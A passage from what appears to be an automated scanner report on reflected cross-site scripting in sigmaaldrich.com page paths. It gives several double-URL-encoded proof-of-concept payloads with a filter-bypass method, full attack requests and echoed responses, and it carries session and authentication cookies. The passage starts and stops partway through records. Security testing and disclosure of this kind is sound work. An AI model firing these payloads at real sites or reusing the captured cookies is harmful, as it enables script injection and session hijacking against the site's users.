bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28927
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry9a4cf";alert(1)//139ebbace98/solvents.html","E404") ;
   </script>
...[SNIP]...

1.65. http://www.sigmaaldrich.com/chemistry/solvents.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/solvents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93497%2522%253balert%25281%2529%252f%252fbb88be0d121 was submitted in the REST URL parameter 2. This input was echoed as 93497";alert(1)//bb88be0d121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/93497%2522%253balert%25281%2529%252f%252fbb88be0d121 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:22 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/93497";alert(1)//bb88be0d121","E404") ;
   </script>
...[SNIP]...

1.66. http://www.sigmaaldrich.com/chemistry/stable-isotopes-isotec.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stable-isotopes-isotec.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353f9%2522%253balert%25281%2529%252f%252f73f0452f72 was submitted in the REST URL parameter 1. This input was echoed as 353f9";alert(1)//73f0452f72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry353f9%2522%253balert%25281%2529%252f%252f73f0452f72/stable-isotopes-isotec.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:22 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry353f9";alert(1)//73f0452f72/stable-isotopes-isotec.html","E404") ;
   </script>
...[SNIP]...

1.67. http://www.sigmaaldrich.com/chemistry/stable-isotopes-isotec.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stable-isotopes-isotec.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b19b%2522%253balert%25281%2529%252f%252fffe6be24476 was submitted in the REST URL parameter 2. This input was echoed as 8b19b";alert(1)//ffe6be24476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/8b19b%2522%253balert%25281%2529%252f%252fffe6be24476 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:24 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/8b19b";alert(1)//ffe6be24476","E404") ;
   </script>
...[SNIP]...

1.68. http://www.sigmaaldrich.com/chemistry/stockroom-reagents.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stockroom-reagents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f87be%2522%253balert%25281%2529%252f%252f2f4b0f11aec was submitted in the REST URL parameter 1. This input was echoed as f87be";alert(1)//2f4b0f11aec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryf87be%2522%253balert%25281%2529%252f%252f2f4b0f11aec/stockroom-reagents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:23 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryf87be";alert(1)//2f4b0f11aec/stockroom-reagents.html","E404") ;
   </script>
...[SNIP]...

1.69. http://www.sigmaaldrich.com/chemistry/stockroom-reagents.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stockroom-reagents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e29%2522%253balert%25281%2529%252f%252f859e850a46d was submitted in the REST URL parameter 2. This input was echoed as 22e29";alert(1)//859e850a46d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/22e29%2522%253balert%25281%2529%252f%252f859e850a46d HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:26 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


